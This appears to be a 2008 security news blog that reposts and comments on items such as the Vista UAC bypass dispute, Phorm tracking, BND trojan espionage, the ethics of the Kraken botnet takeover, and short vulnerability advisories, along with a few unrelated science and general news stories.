NeoSmart Puts Foot in Mouth Over Vista UAC

Via ZDNet -

Software developers from NeoSmart, a not-for-profit technology-development organisation, claim they have successfully bypassed User Account Control, a security feature in Windows Vista.

The developers suggested on their website on Sunday that the feature was "only there to give the impression of security". Critics, however, have said that, by coding around User Account Control (UAC), the developers had simply done what Microsoft had intended them to do.

UAC is a controversial feature of Vista designed to stop users from installing or executing arbitrary code. Many see it as a hindrance to performing everyday tasks, as it requests confirmation for many actions where no user confirmation was needed in Vista's predecessor, XP. UAC does not request these confirmations from users with administrator privileges, but, in Vista, users do not by default have this status.

The NeoSmart developers are behind a tool, iReboot, that helps users choose which operating system they would like to reboot into. UAC had stopped the application from running at start-up, but the developers now claim to have bypassed UAC by splitting iReboot into two. One of the parts, running in the background, has privileged access to the operating system without requiring administrator approval each time the machine boots; the other part, running as a client program, interacts with this back-end service.

As the developers were able to grant the back-end part of the program privileges to run without express user approval every time the machine starts up, they claimed that Windows Vista's security limitations were "artificial at best, easy to code around, and only there to give the impression of security".

"Any program that UAC blocks from starting up 'for good security reasons' can be coded to work around these limitations with (relative) ease," wrote the developers in a blog post. "The 'architectural redesign' of Vista's security framework isn't so much a rebuilt system as much as it is a makeover, intended to give the false impression of a more secure operating system."

However, some individuals posting comments in reply to the blog post disagreed that UAC is an "artificial" security feature. "I feel your pain for having to split a simple program into two, but your ranting is way off the mark," wrote "steveg".

"You haven't coded around [UAC blocks]. Your users have granted your application administrator privileges during installation. Game over. All your base belong to us. Once you've acquired administrator rights, the machine is yours and UAC's role is done. If you had bypassed UAC without the user explicitly granting administrator rights, your rant would be completely justified; as it is, it's merely misinformed and wrong," steveg wrote.

Another poster, "Harry Johnston", said UAC had been expressly designed to force independent software developers to write code which would work in this way. "This is a perfect example of what UAC was actually invented for — to force developers to write software that works for people who aren't logged in as an administrator. Good thing too," he wrote.

These comments echoed earlier statements by Microsoft product unit manager David Cross, who said in a speech at the RSA Conference in San Francisco earlier this month that UAC was deliberately designed to "annoy users", in order to put pressure on third-party software makers to make their applications more secure.

Microsoft had not responded to a request for comment at the time of writing.

--------------------------------

Awesome. Neosmart had to rewrite their application to work for non-admin users, which is exactly what Microsoft wanted third-party software vendors to do.....

Saying that you bypassed UAC, after being given administrator rights by the user behind the computer...is a pretty silly claim. Microsoft has stated in the past that UAC is not a hard security barrier - therefore it should be expected that applications that are purposely installed by the users could work with it.

BT to Implement Better Phorm Opt-Out

Via ThinkBroadband.com -

BT are to develop an alternate method to record your opt-out status to Phorm as opposed to the default cookie based system that relies on your computer storing a cookie to indicate you are not a Phorm user. This follows TalkTalk's decision along the same path back in March and is good news for consumers as it will ensure the opt-in or opt-out status of your account is held more reliably, and is also possible to work across multiple computers on the same Internet connection.

Earlier this month the Information Commissioner Office (ICO) announced that ISPs using the Phorm system had to make it opt-in to comply with European law. This is definitely a step forward for the consumer, but ISPs TalkTalk and BT Retail had already pre-empted this to help ensue consumer confidence in the system.

There are, however, still concerns with regards the legality of the opt-in where computers are used by multiple people. Nicholas Bohm of the Foundation for Information Policy Research (FIPR) has indicated in his legal analysis of Phorm (PDF) that the EU law as referenced above by the ICO actually requires consent from the "data subject", which could be any user of the computer / connection, not just the person who ordered or pays the bills (paragraphs 55-58). In a letter to LINX he goes on to explain that ISPs will need to get consent from all users stating that one possible way to do this is to have the subscriber to the service promise that they are authorized to act on behalf of all users. This could well be a flawed approach as it is unlikely to be the case, particularly of unknown future users of the computer. With no easy way to actually identify the person using the computer, time will have to tell what approach is taken towards this by ISPs.

German Intel Agency (BND) Blasted for Cyber Espionage

Via SecurityFocus -

Eight months after the nation's chancellor accused China of information attacks, Germany now faces criticism over its intelligence agency's use of software designed to spy on other countries' officials.

The latest incident, which began in June 2006, involved Germany's intelligence agency -- the Bundesnachrichtendienst (BND) -- launching an information attack against the Ministry of Commerce and Industry of Afghanistan, ostensibly an ally, according to media reports. Using a Trojan horse, the intelligence agents were able to read an Afghan government official's e-mail, including his correspondence with a reporter working for the German news magazine Der Spiegel, and data stored on the compromised PC's hard drive. The German Constitution protects the secrecy of telecommunications, but BND's legal counsel concluded that, because the messages were stored communications, they did not fall under the constitutional protection, Der Spiegel reported.

The operation ended on November 2006, when a whistleblower sent a letter to his superiors warning of the surveillance, the magazine reported. In February 2008, an anonymous BND employee notified two members of Germany's parliament of the intelligence agency's wiretapping activities. The incident only recently came to light during a Parliament hearing two weeks ago.

German's Interior Minister Wolfgang Schaeuble raised the specter of terrorism during a TV interview to defend the cyber-espionage tactics as necessary. "It's about a few isolated cases," he said, according to an Associated Press report.

The revelations that German intelligence stole information from another country using malicious code is the latest incident of national spying. In November, Germany accused Chinese intelligence officials of spying on its government computer systems. In the United States, the government agency responsible for spying on other countries -- and defending American communications against eavesdropping -- remains accused of wiretapping communications between U.S. citizens and foreign terrorism suspects. And this week, four private investigators in Israel were sentenced to prison for their role in using Trojan horse programs to spy on clients' rivals.

In a previous controversial incident in Germany, BND agents used a Trojan horse to compromise computers of the Democratic Republic of the Congo, aiming to gather information to help German peacekeepers stationed in the troubled nation.

Der Spiegel is considering filing a lawsuit against the intelligence agency, the magazine stated in its coverage of the incident.

Robots to Swarm English Village in UK MoD Contest

Via CNET.com -

A village in England will host a robot hide-and-seek exercise next month, when 11 teams drawn from private companies and universities compete to sniff out snipers, roadside bombs, and other hidden dangers while relaying real-time images to a command post.

The MOD Grand Challenge, as it's called, is billed as the U.K. Ministry of Defense's counterpart to the U.S. DARPA Challenges, except it's military robots that compete against one another instead of robotic cars.

The purpose is to boost development of small robot teams capable of scouting out and alerting troops to potentially dangerous surprises on the urban battlefield. The robots must autonomously negotiate complex, unfamiliar terrain and urban clutter to locate the threats. Points are earned based on the number of threats uncovered in one hour. Points are lost if a team resorts to remote control to maneuver its bots at any stage.

One team, Stellar Consortium, will employ two unmanned aerial vehicles equipped with thermal, visual, and radar sensors to provide surveillance of the village. The data will then be used to direct a small robot on the ground.

The Swarm Systems team will field eight battery-powered, GPS-guided, Frisbee-sized, propeller-driven micro air vehicles (MAVs) called "Owls." These airborne bots hover and dart like birds while communicating with one other and a base station using Wi-Fi.

The highest-scoring team gets a shot at a lucrative MOD contract and a chance to see its system put to work in Afghanistan or southern Iraq.

Secret Sanya - China's New Nuclear Naval Base Revealed

Via Jane's Information Group -

China is constructing a major underground nuclear submarine base near Sanya, on Hainan Island off its southern coast, Jane's can confirm. Although Asian military sources have disclosed this fact to Jane's since 2002, high-resolution commercially available satellite imagery from DigitalGlobe allows independent verification of the previous suggestions.

The extent of construction indicates the Sanya base (also known as Yulin) could become a key future base for People's Liberation Army Navy (PLAN) aircraft carriers and other power-projection ships. In December 2007, perhaps in concert with a major PLAN exercise the previous month, the PLA moved its first Type 094 second-generation nuclear ballistic missile submarine (SSBN) to Sanya.

An underground submarine base and the positioning of China's most advanced sub-surface combatants at Sanya would have implications for China's control of the South China Sea and the strategically vital straits in the area. Further satellite imagery suggests the construction of Sanya has been supported by a gradual military build-up in the Paracel Islands over the last 20 years, and the transformation of the Chinese-occupied features in the Spratly Island group into assets that could support a range of military operations.

China's nuclear and naval build-up at Sanya underlines Beijing's desire to assert tighter control over this region. China's increasing dependence on imported petroleum and mineral resources has contributed to an intensified Chinese concern about defending its access to vital sea lanes, particularly to its south. It is this concern that in large part is driving China's development of power-projection naval forces such as aircraft carriers and long-range nuclear submarines.

China has pursued this build-up at Sanya with little fanfare, offering no public explanations regarding its plan to base nuclear weapons or advanced naval platforms there.

For both regional and extra-regional powers, it will be difficult to ignore that China is now building a major naval base at Sanya and may be preparing to house and protect a large proportion of its nuclear forces here, and even operate them from this base. This development so close to the Southeast Asian sea lanes so vital to the economies of Asia can only cause concern far beyond these straits.

IBM Quietly Takes a Stake in Spansion's Racetrack Memory

Via BetaNews.com -

After quietly taking an equity stake in two-year-old startup flash memory manufacturer Spansion, IBM now plans to augment its own still emerging, futuristic "racetrack" memory with flash memory dubbed MirrorBit.

IBM envisions its highly non-volatile, endlessly rewritable racetrack memory (RM) technology as capable of storing 3,500 movies on a single handheld MP3 player within the next decade. Now, under a cross-licensing deal officially announced today, IBM will work with the world's #1 producer of NOR flash memory, Spansion, to produce RM.

Together, the two will co-develop RM, a magnetic medium with no moving parts, and MirrorBit, a "charge trapping" technology designed to increase the density of a flash memory array while keeping costs down on manufacturing.

As a particular target, the two companies are honing in on China, where Spansion employs more than 1,300 people at design centers in Beijing and Suzhou, a manufacturing plant in Suzhou, and three sales and marketing offices.

Already in use by the top ten automotive OEMs, MirrorBit is also utilized in embedded systems ranging from gaming machines and wireless devices to telecom networking equipment.

Declassified NSA Document Reveals the Secret History of TEMPEST

Via Wired.com -

It was 1943, and an engineer with Bell Telephone was working on one of the U.S. government's most sensitive and important pieces of wartime machinery, a Bell Telephone model 131-B2. It was a top secret encrypted teletype terminal used by the Army and Navy to transmit wartime communications that could defy German and Japanese cryptanalysis.

Then he noticed something odd.

Far across the lab, a freestanding oscilloscope had developed a habit of spiking every time the teletype encrypted a letter. Upon closer inspection, the spikes could actually be translated into the plain message the machine was processing. Though he likely didn't know it at the time, the engineer had just discovered that all information processing machines send their secrets into the electromagnetic ether.

Call it a TEMPEST in a teletype.

This story of how the United States first learned about the fundamental security vulnerability called "compromising emanations" is revealed for the first time in a newly-declassified 1972 paper TEMPEST: A Signal Problem (.pdf), from the National Security Agency's secret in-house journal Cryptologic Spectrum.

"There has always been speculation about TEMPEST coming out of the Cold War period," says Joel McNamara, author of Secrets of Computer Espionage: Tactics and Countermeasures, who maintained for years the best compilation of public information on TEMPEST. "But the 1943 Bell Labs discovery is roughly ten years earlier than I would have expected."

The unnamed Bell Telephone technician was the Alexander Graham Bell of a new, secret science, in which electronic eavesdroppers -- as far away as hundreds of feet from their target tune into radio waves leaking from electronic equipment to steal secrets.

Building on the breakthrough, the U.S. developed and refined the science in an attempt to spy on the Soviets during the Cold War. And it issued strict standards for shielding sensitive buildings and equipment. Those rules are now known to government agencies and defense contractors as TEMPEST, and they apply to everything from computer monitors to encrypted cell phones that handle classified information.

Until now, little has been known about when and how the U.S. government began trying to protect itself from this threat, and the NSA paper tells the story well.

Humor: CIA Coffee Mug

As a recovering coffee snob, I have quite a collection of coffee cups. Recently a friend was cleaning out their closet and found a Central Intelligence Agency Coffee Mug.

Of course, this friend knew of my background in the coffee industry and was nice enough to offer it to me, so I added it to my coffee cup collection. Well, it is less of a collection and more like a spot in my kitchen cabinet which contains a large number of coffee cups...but I digress.

According to my friend, it was acquired at the CIA gift shop in the late 90s (yea, they have/had a gift shop).

Anyways, here it is.




But guess what I found on the bottom??



Awesome. lol

Kraken Botnet Infiltration

Via DVLabs Blog -

Earlier this month a number of articles surfaced on the research and disagreements with regards to the size and classification of a large bot net named Kraken. At the front line of the debate was SecureWorks and Damballa. Secureworks claims Kraken is actually Bobax and estimates the bot net to include over 185,000 compromised systems. Damballa disagrees stating that Kraken is an entirely new bot net with a size over twice as large as Storm. Semantics aside no one disagrees that Kraken/Bobax is among the largest of the known bot nets if not the largest.

Cody and I thought it would be interesting to examine Kraken with the specific goal of infiltrating the bot network. We started with a sample from Offensive Computing and working from there eventually concluded that we would indeed be able to infiltrate and take over increasingly larger portions of the Kraken bot net. Cody did most of the manual labor of protocol dissection, reverse engineering the encryption routines and eventually creating a fake Kraken server capable of overtaking a redirected zombie. His detailed write up on the reverse engineering process is available under "Owning Kraken".

...

Various estimates place the overall size of the botnet to be somewhere between 185,000 and 600,000 zombies. This means that within a single week we would have been able to take over anywhere from 4% to 14% of the infected population ... and this is where we entered into a moral dilemma and ethical discussion. We have the ability to successfully redirect infected systems. We have the ability to provide an 'update' through the existing Kraken protocol that can simply remove the Kraken zombie (again see "Owning Kraken" for a video demonstrating this capability). Is it wrong to do so? Although this discussion is similar to that of writing "good worms" that roam the internet patching vulnerable servers, there is a key difference in that a good worm can't be stopped. Once it has been released it is a self spreading uncontrollable entity. In our specific case however we have the ability to cease at any point. It is simply a one to one relationship. An infected system connects to us, we supply a simple binary to kill the target process, we never hear from the infected system again and neither can the actual botnet owners command and control servers.

Cody and I both are pro "cleansing". Dave Endler on the other hand is against. The arguments for pro-cleansing are obvious, the arguments against are a little more complicated. The most interesting of points that Dave brought up is the corner case of what happens if we accidentally crash the target system? What if that target system is responsible for someone's life support? Yes the system is already infected with a SPAM delivering zombie capable of receiving arbitrary updates from malicious actors, but at least for now it's running and carrying out the rest of it's functionality. As director of DVLabs, Dave's opinion overshadows that of our own so we simply sit and monitor. What are your personal thoughts on the matter?

--------------------------

The Tipping Point team brings up an interesting question.

Taking down the majority of the Kraken botnet with a rogue delete/shutdown command is a very "technically sweet" solution. However, it could have very serious consequences.

First, we don't know exactly what all of these computers are doing. As Dave pointed out, one could be controlling a life support system in a hospital. Another could be controlling some SCADA system. Another could be a server at a bank or another major corporation.

What if the command doesn't work perfectly on all the bots? Whats if the computer running the bot is already in an unstable condition due to massive infection? Will the computer crash or just reboot?

If the "cleansing" turns out to do physical damage in the real world, who will be responsible? Tipping point? The people that issued the command? Or the owner of the infected computer? Who knows.

From the standpoint of Tipping point, the idea of attempting to clean the bots sounds good but brings with it too much risk....risk that the corporation doesn't need.

It reminds me of the police pursuit question. Should police chase after a criminal if it will place innocent citizens in greater danger?

Its a grey-area for sure, but I think most people rather err on the side of caution...and not chase the everyday criminal if it will endanger the public.

Thieves Grab Backup Tapes Holding 2M Medical Records

Via ComputerWorld -

University of Miami officials last week acknowledged that six backup tapes from its medical school that contained more than 2 million medical records was stolen in March from a van that was transporting the data to an off-site facility.

Jacqueline Menendez, vice president of communications at the university, said a vehicle used by Archive America Ltd. to transport the patient data was broken into in downtown Coral Gables, Fla., on March 17. Thieves removed a transport case carrying the school's computer backup tapes, she said.

For reasons Menendez could not explain, Archive America waited 48 hours before finally notifying the university on Mar. 19 about the break-in and theft. Officials from the transport firm couldn't be reached.

The university posted an alert about the incident on April 17, a full month after the backup tapes were stolen. In a statement, Doctor Pascal J. Goldschmidt, senior vice president for medical affairs and dean of the University of Miami Miller School of Medicine, said, "Even though I am confident that our patients' data is safe, we felt that in the best interest of the physician-patient relationship we should be transparent in this matter."

Since the incident, Mendendez said that the university temporarily stopped transporting backup data off-site. "At this point, we're not transporting anything until we conduct our own internal evaluation of the incident and see if there's anything that could have been done differently or better," she said.

Coral Gables law enforcement officials, who are investigating the incident, have informed the school that it was likely a "random theft," Mendendez noted.

The stolen backup tapes hold names, addresses, Social Security numbers and health information all patients at university medical facilities since Jan. 1, 1999. Financial data from approximately 47,000 people may be on the missing tapes, said Mendendez. Each potential victim has been contacted by the school, she said.

Radio Free Europe Under Cyber Attack

Via myway.com -

PRAGUE, Czech Republic (AP) - Several Web sites of the U.S.-funded Radio Free Europe/Radio Liberty have been attacked, the broadcaster said Monday, suggesting the Belarus government could be responsible.

In the form of a denial-of-service attack that floods servers with fake traffic so legitimate visitors cannot get through, the assault began Saturday and continues, the network said in a statement.

The broadcaster said it is trying to restore its Web sites.

The attack is aimed mainly the site of Radio Free Europe's Belarus service, but Web sites serving Iran, Russia, Azerbaijan, Tajikistan, Kosovo, Macedonia, Bosnia and Croatia also have been affected, the network said.

Jeffrey Gedmin, the network's president, compared the attack to communist countries jamming U.S.-backed broadcasts during the Cold War.

"Dictators are still trying to prevent the kind of unfiltered news and information that (Radio Free Europe) provides from reaching their people," Gedmin said. "They did not succeed in the last century and they will not succeed now."

Radio Free Europe/Radio Liberty is a private, nonprofit corporation that receives funding from the U.S. government. It was established in 1949 to spread pro-Western news and promote democratic values and institutions in countries behind the Iron Curtain.

The head of the radio's Belarus service, Alexander Lukashuk, said the attack began on the 22nd anniversary of the Chernobyl nuclear catastrophe in neighboring Ukraine. He said a similar attack took place the same day one year ago but lasted only hours and did not hit services in other languages.

"We have a large Internet audience (in Belarus) that was relying on us to report live a rally of thousands of people protesting the plight of uncompensated Chernobyl victims and a government decision to build a new nuclear power station," he said.

The broadcaster suggested the government of authoritarian Belarus President Alexander Lukashenko could be behind the attack.

"It's very hard to be certain in these cases but because the target was the Belarus service it does look like it's coming from the Belarus government," said Diane Zeleny, spokeswoman for the broadcaster.

"For our listeners in Belarus, it's quite dramatic," Zeleny said. "They cannot reach us right now. This is a pretty massive attack."

"There was no immediate response from the Belarussian government."

Antivirus Vendors Pan Free Research From DefCon Contest

Via arstechnica.com -

A new contest focused on testing antivirus and malware software has been announced for the DefCon hacker conference in August. Antivirus vendors are crying foul, but they could very well be ignoring one of the best opportunities to improve their own products.

Called "The Race to Zero," this sideline contest provides hackers with samples of virus and malware code. The challenge is to modify the code in such a way that it can successfully circumvent antivirus products running at a central portal at the conference.

The Race to Zero web site explains that the goal is not to crowdsource new viruses, saying, "Not all antivirus is equal, some products are far easier to circumvent than others. Poorly performing antivirus vendors should be called out." The site also states that modified samples will not be released into the wild and that a key element of the contest's big picture is that "you need to look at controlling your endpoint devices with patching, firewalling and sound security policies to remain virus free."

Race to Zero will award the overall winning team or individual for successful code that passes through the AV products in each round. In addition, other awards will be given for things like "most elegant obfuscation," "dirtiest hack of an obfuscation," "comedy value," and "most deserving of beer." Details have not been released as to what each of these awards will be (though beer appears to be involved).

Obviously, virus and malware authors don't need a conference to collaborate on attacking AV products, but that isn't stopping the vendors from slamming Race to Zero. "[The contest] will do more harm than good," TrendMicro's Paul Ferguson told Network World. "Responsible disclosure is one thing, but now actually encouraging people to do this as a contest is a little over the top."

Roger Thompson, chief research officer at AVG Technologies, says vendors are already processing 30,000 code samples each day. "It's hard to see an upside for encouraging people to write more viruses."

On the other side of this coin, however, is a mountain of criticism against AV vendors that their products are falling behind in the use of emerging techniques and technologies. As malware organizations adopt Software as a Service business models, statements on the Race to Zero web site that "signature-based antivirus is dead" and "people need to look to heuristic, statistical and behaviour-based techniques to identify emerging threats" echo a growing dissatisfaction with the AV industry.

Instead of trying to deride Race to Zero, the AV industry could have a chance at working with the contest to harness what, in reality, could turn out to be some of the best research available on new malicious techniques. "You get what you pay for," as the old saying goes, but in the case of Race to Zero, the AV industry could be passing up a veritable gold mine of free ideas on how to better fight new threats.

------------------------------------------

Fergie is a long time friend and I hold him in great respect, but personally I feel that people need to be shown what AV really is....just another tool.

Tons of people still think that running AV is grand protection from everything, but this just isn't true. AV protects solid protection from known threats, but new emerging threats from a targeted attack are rarely stopped. The information is out there...for all to see.

Like it not, but showing people the truth is the essence of Defcon.

Do you think lock makers love the lockpick village? Of course not.

Should we not highlight the flaws in those silly RFID chips that the government wants to stick in everything? Of course we should.

Locks and RFID cards offer a layer of protection as well.

But in the end, they are just another tool.

Simple Brain Exercise Can Boost IQ

Via newscientist.com -

Can mental training improve your intelligence? No video game or mental puzzle has convincingly been shown to work. But now a group of neuropsychologists claims it has found a task that can add points to a person's IQ – and the harder you train, they say, the more you gain.

So-called "fluid intelligence", or Gf, is the ability to reason, solve new problems and think in the abstract. It correlates with professional and educational success and it appears to be largely genetic.

Past attempts to boost Gf have suggested that, although by training you can achieve great gains on the specific training task itself, those gains don't transfer to other tasks.

Now Susanne Jaeggi at the University of Michigan at Ann Arbor, US, and her colleagues say that is not true.

They invited 70 healthy adults to participate in a challenging training exercise known as the "dual n-back" task.

The first part of the exercise involves small squares on a screen that pop into a new location every three seconds. Volunteers have to press a button when the current location is a duplicate of two views earlier.

For the second part, the volunteers have to simultaneously carry out the same task with letters. Consonants are played through headphones and they have to press a button when they hear one that is the same as that heard two "plays" earlier.

If participants perform well, the interval to be tracked (n) increases to three or more stages earlier.

Jaeggi's volunteers were trained daily for about 20 minutes for either 8, 12, 17 or 19 days (with weekends off). They were given IQ tests both before and after the training.

The researchers found that the IQ of trained individuals increased significantly more than controls – and that the more training people got, the higher the score.

Glass Chip Spins Silk Just Like a Spider

Via newscientist.com -

It can't rival Spider-Man yet, but a new micromachine that works like a spider's silk duct might finally lead the way to producing industrial quantities of high-quality artificial spider silk.

Spider silk is super-light, super-strong and elastic too. Existing human materials lack its useful combination of properties, and proposed uses span everything from bulletproof vests to optic fibres.

Researchers have struggled for years to find an industrial process to make spider silk, and have tried everything from making it in a lab dish to creating silk-secreting goats.

Now German researchers have demonstrated a new method of production – an artificial version of the ducts spiders use to "spin" the silk.

Spiders' silk ducts contain glands that process a gel of simple proteins into long fibres of protein. Different glands alter the chemistry of the gel in different ways, producing silk with different properties.

The artificial duct is a glass chip shot through with tiny tubes that tries to mimic those processes.

"The best thing is to reproduce nature, instead of cutting open spiders," says Andreas Bausch of the Technical University of Munich in Germany, who led the research with Thomas Scheibel of the University of Bayreuth, also Germany.

Bausch and Scheibel are the first to create a device that so accurately recreates the chemical and physical conditions of a real silk duct.

They are also the first to make fibres containing more than one silk protein. The chip uses two – known as ADF3 and ADF4 – found in silk from the European garden spider (Araneus diadematus).

Spitzer Call Girl Sues 'Girls Gone Wild'

Via AP -

The call girl linked to the downfall of former New York Gov. Eliot Spitzer sued the founder of the "Girls Gone Wild" series on Monday for $10 million, claiming he exploited her image and name to advertise the racy videos.

Ashley Alexandra Dupre, 22, contended in the lawsuit that she was only 17 — too young to sign legally binding contracts — and drunk on spring break in 2003 when she agreed to be filmed for "Girls Gone Wild" in Miami Beach.

Dupre "did not understand the magnitude of her actions, nor that her image and likeness would be displayed in videos and DVDs," says the lawsuit filed by Miami attorney Richard C. Wolfe.
The lawsuit filed in federal court in Miami names as defendants "Girls Gone Wild" founder Joe Francis, two of his companies and a man purportedly involved in creation of two Internet sites that the lawsuit contends improperly use Dupre's image to sell DVDs and other products.

Francis, 35, has built a soft porn empire filming and marketing videos of young women exposing their breasts and being shown in other sexually provocative situations, often at public events such as Mardi Gras or spring break beach locales.

Dupre gained notoriety in March when it came out that she was the high-priced call girl named "Kristen" named in court documents who was hired by Spitzer for at least one tryst at a posh Washington hotel. Spitzer, known as "Client 9" in the documents, resigned as New York governor a few days after the scandal broke.

Francis made a public $1 million offer for Dupre to appear in a "Girls Gone Wild" video and go on a promotional tour, then rescinded the offer after he realized he already had footage of Dupre from 2003. Dupre's lawyer warned she was only 17 when the video was shot, not 18 as Francis claimed.

Francis said in March that Dupre spent a week on a "Girls Gone Wild" bus and made seven full-length tapes after signing release papers. He also said he bought her a bus ticket home to North Carolina.

Francis said he was surprised by the lawsuit.

"It is incomprehensible that Ms. Dupre could claim she did not give her consent to be filmed by Girls Gone Wild, when in fact we have videotape of her giving consent, while showing her identification," Francis said in a statement.

-------------------------

What a silly story...

Humor: Zealous Autoconfig

Airport Face Scans to Begin This Summer in UK

Via Guardian UK -

Airline passengers are to be screened with facial recognition technology rather than checks by passport officers, in an attempt to improve security and ease congestion, the Guardian can reveal.

From summer, unmanned clearance gates will be phased in to scan passengers' faces and match the image to the record on the computer chip in their biometric passports.

Border security officials believe the machines can do a better job than humans of screening passports and preventing identity fraud. The pilot project will be open to UK and EU citizens holding new biometric passports.

But there is concern that passengers will react badly to being rejected by an automated gate. To ensure no one on a police watch list is incorrectly let through, the technology will err on the side of caution and is likely to generate a small number of "false negatives" - innocent passengers rejected because the machines cannot match their appearance to the records.

They may be redirected into conventional passport queues, or officers may be authorised to override automatic gates following additional checks.

Ministers are eager to set up trials in time for the summer holiday rush, but have yet to decide how many airports will take part. If successful, the technology will be extended to all UK airports.

The automated clearance gates introduce the new technology to the UK mass market for the first time and may transform the public's experience of airports.

Existing biometric, fast-track travel schemes - iris and miSense - operate at several UK airports, but are aimed at business travellers who enroll in advance.

The rejection rate in trials of iris recognition, by means of the unique images of each traveller's eye, is 3% to 5%, although some were passengers who were not enrolled but jumped into the queue.

--------------------------

They should do this in the states....if it removes the need for me to take off my shoes.

Gezz, that is a stupid rule.

VXers Slap Copyright Notices on Malware

Via The Register UK -

Malware authors have lifted a page from the legit software industry's rule book and are slapping copyright notices on their Trojans.

One Russian-based outfit has claimed violations of its "licensing agreement" by its underworld customers will result in samples of the knock-off code being sent to anti-virus firms.

The sanction was spotted in the help files of a malware package called Zeus, detected by security firm Symantec as "Infostealer Banker-C". Zeus is offered for sale on the digital underground, and its creators want to protect their revenue stream by making the creation of knock-offs less lucrative.

The copyright notice, a reflection of a lack of trust between virus creators and their customers, is designed to prevent the malware from being freely distributed after its initial purchase. Virus writers are essentially relying on security firms to help them get around the problem that miscreants who buy their code to steal online banking credentials have few scruples about ripping it off and selling it on.

In a blog posting, Symantec security researchers have posted screen shots illustrating the "licensing agreement" for Infostealer Banker-C.

The terms of this licensing agreement demands clients promise not to distribute the code to others, and pay a fee for any update to the product that doesn't involve a bug fix. Reverse engineering of the malware code is also verboten.

"These are typical restrictions that could be applied to any software product, legitimate or not," writes Symantec researcher Liam O'Murchu, adding that the most noteworthy section deals with sanctions for producing knock-off code (translation below).

In cases of violations of the agreement and being detected, the client loses any technical support. Moreover, the binary code of your bot will be immediately sent to antivirus companies.

Despite the warning copies of the malware were traded freely on the digital underground days after its release, Symantec reports. "It just goes to show you just can’t trust anyone in the underground these days," O'Murchu notes.

--------------------------

Wow. This means that malware authors are threating to report their own creation to AV companies, if the client attempts to screw the malware author (they don't care if you steal bank records with it). It is like some type of written DRM for malware.

This should also show the world how confident malware authors are about evading AV detection. They are willing to send in their own program...just to screw their client - since they can easily modify it to evade detection again right afterwards.

Hackers Shut Down Bank of Israel

Via The Register UK -

Hackers have managed to shut down the Bank of Israel for two whole days, taking advantage of the Jewish festival of Passover, when senior staff members were out of the office.

According to Israeli newspaper Globes, who were first to alert the bank to the fact that they’d been attacked, hackers managed to scrawl "Hear me Jews, you're a nation whose fate is sealed and sooner or later you will lose in war."

The Bank of Israel was quick to close the site until it could get a handle on who exactly was behind the attack, and what damage they had done. The Bank also said that it was 'temporarily closed', but that might just be because its lazy, and patently hopeless security staff wanted to stretch the long weekend out a bit further.

Globes reported that the text went on to say "Victory will come, inshallah (God willing) and the scenario of Chechnya will be repeated and we will drive you out. Millions of young Muslims are willing to die for al-Quds (Jerusalem), which belongs to us."

Globes was apparently told by its sources in the bank that financial reports going as far up as October 2007 had been deleted from the bank’s systems, but Bank of Israel spokesman, Yossi Saadon, said that the problem was 'being dealt with' and that the 'incident has no effect on the bank's internal systems'.

He added that all transactions were protected in such a way that there was no conceivable way that anyone could have hacked into the actual data systems from the Internet. He hopes.

Algeria is the top susupect but not the only one. Some Israelis think that Hizbullah is much more likely to be behind the attack, or Qatar, or even Palestinians from Gaza. But seeing as most of these groups tend to blow things up as a way of expressing themselves, the bank hack seems a tad too articulate.

The bank will be open for business again once the remaining questions about the embarrassing hack have been answered. Or just as soon as the bank’s employees can be bothered to drag themselves back to the office. Probably the latter.

Experts Crack New Kraken Variant

Via DarkReading.com -

Leading security software vendor, PC Tools revealed that it has identified a new variant of the Kraken bot, also known as Bobax, and has disclosed the source code of its key component. The new variant employs new techniques to evade detection which makes this latest Kraken bot a significant threat.

“PC Tools are revealing the details of the latest Kraken variant including the new list of domain names as well as the mathematical algorithm used. The source code of the Kraken domain name generation algorithm is disclosed in the interests of congregating all the knowledge about this bot so that other security specialists can benefit from it,” said Sergei Shevchenko, Senior Malware Researcher, PC Tools. “The more collective knowledge security vendors have over this threat, the greater the chance the industry has of defeating it,” said Shevchenko.

PC Tools Pty Ltd.

Multiple Insecure Methods in AppScan Watchfire Web Application Security v 7.0

An arbitrary file overwrite has been discovered in an ActiveX control installed with the WatchFire Appscan v 7.0.

by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r

http://www.milw0rm.com/exploits/5496

Insecure Methods in HP Update Software

Execute code remotely is possible using methods ExecuteAsync and Execute :-)
If a user visits the malicious page the attacker can execute code.
Coded by callAX

http://www.milw0rm.com/exploits/5511

------------------------

According to Secunia, HP has addressed the vulnerabilities in 4.000.010.008 (see HP advisory for details).

Anti-Spyware Coalition Probes Data Pimping

The Register UK -

The Anti-Spyware Coalition has launched a review of Phorm, NebuAd, and other behavioral targeting firms that track user data from inside the world's ISPs.

Today, the ASC - a collection of anti-spyware companies, academics, and various consumer advocates - announced a new internal working group to decide how Phorm and the Phormettes will affect the organization's overarching policies on spyware.

These policies serve as guidelines for the leading anti-spyware apps. "We update our documents when a new potential threats and new potentially-unwanted technologies emerge," says Ari Schwartz, the vice president and chief operating officer at the Center for Democracy and Technology, which first organized the ASC. "Some [anti-spyware companies] have said that behavioral advertising is a gray area when it comes to the ASC definitions. And if some people think this a gray area, it's something we need to look at."

Through partnerships with ISPs on both sides of the Atlantic, companies such as Phorm, NebuAd, and Front Porch track search and browsing activity in an effort to target online ads. Phorm and NebuAd serve up ads on their own, while Front Porch licenses its data to third-party ad networks.

In some cases, anti-spyware tools already flag the ad-server cookies laid down by the likes of Phorm and NebuAd - as well as cookies used by Front Porch partners. The big question is how the cookies should be flagged.

"We need to go into detail on how the consent factors work here. Does someone clearly know they're being tracked or not?" Schwartz says. "We must determine what level of risk is tied to these things."

All three of these behavioral ad firms insist the data they collect includes no personally identifiable information. But it's unclear whether users are properly notified before these services are turned on.

NebuAd says that ISP partners are required to "directly notify" users via letter or email, but this hasn't always happened in the past. In some cases, Front Porch notifies users with a conspicuous in-browser message. But in other cases, it does not.

Phorm hasn't officially rolled out its service, but it has agreements with BT, Carphone Warehouse, and Virgin in the UK (though Virgin insists this does not mean it will actually use the service). Carphone has said it will ask for user consent before turning Phorm on, but the others have not. In 2006 and 2007, Phorm conducted trials on BT's network without telling customers diddly.

Other operations that appear to be working on similar services include a Bay Area company called Adzilla; and Project Rialto, a "stealth company" created by Alcatel-Lucent, but these firms have not responded to our interview requests.

In Shift, China Offers to Meet With Dalai Lama Envoys

Via NYTimes -

BEIJING — China appeared to bend to international pressure on Friday as the government announced it would meet with envoys of the Dalai Lama, an unexpected shift that comes as violent Tibetan demonstrations in western China have threatened to cast a pall over the Beijing Olympics in August.

